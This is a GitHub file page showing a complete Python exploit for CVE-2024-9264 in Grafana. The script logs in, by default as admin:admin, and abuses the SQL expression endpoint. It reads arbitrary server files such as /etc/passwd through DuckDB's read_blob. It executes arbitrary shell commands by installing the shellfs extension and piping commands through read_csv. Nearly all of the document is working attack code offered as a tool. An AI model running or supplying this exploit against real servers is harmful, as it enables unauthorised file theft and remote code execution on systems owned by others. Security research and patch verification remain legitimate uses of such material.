-
Notifications
You must be signed in to change notification settings - Fork 17
/
Copy pathCVE-2024-9264.py
executable file
·162 lines (133 loc) · 5.31 KB
/
CVE-2024-9264.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
#!/usr/bin/env python3
# https://github.com/nollium/CVE-2024-9264/tree/main
# - Requirements (install with pip):
# ten
# psycopg2-binary
from ten import *
from tenlib.flow.console import get_console
from typing import cast, List, Dict, Optional, Any
from psycopg2.extensions import adapt
import sys
# Force ten to write its messages to stderr, so that stdout carries only the
# retrieved data and the user can redirect the file output separately from the
# message log.
# E.g: python3 CVE-2024-9264.py -f /etc/passwd http://localhost:3000 > file.txt 2> logs.txt
console = get_console()
console.stderr = True
@inform("Logging in with provided or default credentials")
def authenticate(session: ScopedSession, user: str, password: str) -> None:
    """Log in to the target by POSTing the credentials to ``/login``.

    The login counts as successful only when the JSON response carries
    ``"message": "Logged in"``; every other response is reported through
    ``failure()``.

    Args:
        session: HTTP session bound to the target base URL. Presumably it
            keeps the authentication cookies for later requests -- confirm
            against ten's ``ScopedSession``.
        user: Account name to log in with.
        password: Password for ``user``.
    """
    path = "/login"
    data = {"password": password, "user": user}
    res = session.post(path, json=data)

    # A body that is not JSON, is not a JSON object, or has no "message" key
    # must end in the regular "failed to log in" report instead of an
    # unhandled KeyError/traceback.
    # NOTE(review): assumes the response follows the `requests` convention of
    # raising a ValueError subclass on undecodable JSON -- confirm for ten.
    try:
        body = res.json()
    except ValueError:
        body = None
    msg = body.get("message") if isinstance(body, dict) else None

    if msg == "Logged in":
        msg_success(f"Logged in as {user}:{password}")
    else:
        failure(f"Failed to log in as {user}:{password}")
@inform("Running duckdb query")
def run_query(session: ScopedSession, query: str) -> Optional[List[Any]]:
    """Send ``query`` as a SQL expression to ``/api/ds/query`` and return its values.

    Args:
        session: HTTP session used to POST the request.
        query: SQL text placed in the ``expression`` field of the request.

    Returns:
        The ``values`` list of the first frame of result ``"B"``, or ``None``
        when the response carries a top-level ``message``, or does not have
        the expected shape. The "DuckDB not installed" and empty-values cases
        are reported through ``failure()``.
    """
    endpoint = "/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101"
    sql_expression = {
        "datasource": {
            "name": "Expression",
            "type": "__expr__",
            "uid": "__expr__",
        },
        "expression": query,
        "hide": False,
        "refId": "B",
        "type": "sql",
        "window": "",
    }
    payload = {
        "from": "1729313027261",
        "queries": [sql_expression],
        "to": "1729334627261",
    }
    body = cast(Dict, session.post(endpoint, json=payload).json())

    # The answer is keyed by the refId sent above ("B"). A missing DuckDB
    # binary shows up there as a "no such file or directory" error.
    if "results" in body and "B" in body["results"]:
        answer = body["results"]["B"]
        if "error" in answer and "no such file or directory" in answer["error"]:
            failure("DuckDB is not installed on the target system. This exploit requires DuckDB to be present in the system PATH.")
            return None

    # A top-level "message" is treated as an unexpected response; dump it.
    if body.get("message"):
        msg_failure("Received unexpected response:")
        msg_failure(json.encode(body, indent=4))  # prettify json
        return None

    try:
        rows = cast(List, body["results"]["B"]["frames"][0]["data"]["values"])
        if len(rows) == 0:
            failure("File not found")
            return None
        msg_success("Successfully ran duckdb query:")
        msg_success(f"{query}:")
        return rows
    except (KeyError, IndexError):
        # Any missing key/index on the way down means the shape is not the
        # one this function knows how to read.
        msg_failure("Unexpected response format:")
        msg_failure(json.encode(body, indent=4))
        return None
# Output's non-printable characters are unicode escaped
def decode_output(values: List[str]) -> bytes:
    """Turn the escaped text in ``values[0][0]`` back into raw bytes.

    Backslash escape sequences in the text (e.g. ``\\x00``, ``\\n``) are
    interpreted, and each resulting character is then mapped to a single byte.

    NOTE(review): the value is indexed as ``values[0][0]``, so the argument is
    presumably a list of columns rather than a flat ``List[str]`` -- confirm
    and tighten the annotation.

    Args:
        values: Query result values; only ``values[0][0]`` is read.

    Returns:
        The decoded content as bytes.
    """
    escaped_text = values[0][0]
    # Round-trip through bytes so that "unicode_escape" can interpret the
    # backslash sequences; latin1 then maps code points 0-255 to bytes 1:1.
    as_bytes = escaped_text.encode("utf-8")
    unescaped = as_bytes.decode("unicode_escape")
    return unescaped.encode("latin1")
def read_remote_file(session: ScopedSession, filepath: str) -> Optional[bytes]:
    """Read a file from the remote server using read_blob.

    Args:
        session: HTTP session passed through to ``run_query``.
        filepath: Path of the file to read on the server.

    Returns:
        The decoded file content, or ``None`` when the query returned nothing.
    """
    # adapt() renders the path as a quoted SQL literal for the query text.
    quoted_path = adapt(filepath)
    rows = run_query(session, f"SELECT content FROM read_blob({quoted_path})")
    return decode_output(rows) if rows else None
def execute_command(session: ScopedSession, command: str) -> Optional[bytes]:
    """Execute a command and return its output using shellfs.

    The command's stdout and stderr are redirected to a fixed temporary file
    on the server, which is then fetched with ``read_remote_file``.

    NOTE(review): ``command`` is interpolated verbatim inside a single-quoted
    SQL literal, so a command containing a single quote alters the query text.

    Args:
        session: HTTP session passed through to the query helpers.
        command: Shell command line to run.

    Returns:
        The captured output as bytes, or ``None`` when it could not be read.
    """
    output_path = "/tmp/grafana_cmd_output"
    statements = (
        "SELECT 1;",
        # Install and load shellfs if not already loaded
        "install shellfs from community;",
        "LOAD shellfs;",
        # Run the command with its output redirected to the temporary file
        f"SELECT * FROM read_csv('{command} >{output_path} 2>&1 |')",
    )
    # The query's own return value is not used; the output is read back below.
    run_query(session, "".join(statements))
    return read_remote_file(session, output_path)
@entry
@arg("url", "URL of the Grafana instance to exploit")
@arg("user", "Username to log in as, defaults to 'admin'")
@arg("password", "Password used to log in, defaults to 'admin'")
@arg("file", "File to read on the server, defaults to '/etc/passwd'")
@arg("query", "Optional query to run instead of reading a file")
@arg("command", "Optional command to execute on the server")
def main(url, user="admin", password="admin", file=None, query=None, command=None):
    """Exploit for Grafana post-auth file-read and RCE (CVE-2024-9264)."""
    # NOTE(review): the docstring and the @arg descriptions above are
    # presumably surfaced as CLI help by ten -- keep their wording stable.

    # file / query / command select the mode and are mutually exclusive.
    chosen_modes = [opt for opt in (file, query, command) if opt is not None]
    if len(chosen_modes) > 1:
        failure("Cannot specify more than one of: file, query, or command arguments.")

    session = ScopedSession(base_url=url)
    authenticate(session, user, password)

    if command:
        msg_success(f"Executing command: {command}")
        payload = execute_command(session, command)
    elif not query:
        # Neither command nor query given: read a file (default /etc/passwd).
        file = file or "/etc/passwd"
        msg_success(f"Reading file: {file}")
        payload = read_remote_file(session, file)
    else:
        # Handle direct query execution: the values are printed as JSON.
        rows = run_query(session, query)
        if rows:
            print(json.encode(rows, indent=4))
        return

    if payload:
        # Flush pending log messages, then switch the console back to stdout
        # so the raw bytes land on stdout rather than in the message log.
        console.file.flush()
        console.stderr = False
        bin_print(payload)
# pylint: disable=no-value-for-parameter
if __name__ == "__main__":
    # Run only when executed as a script, so importing this module has no
    # side effects. main() is called without arguments on purpose (hence the
    # pylint waiver above); presumably @entry fills them from the command line.
    main()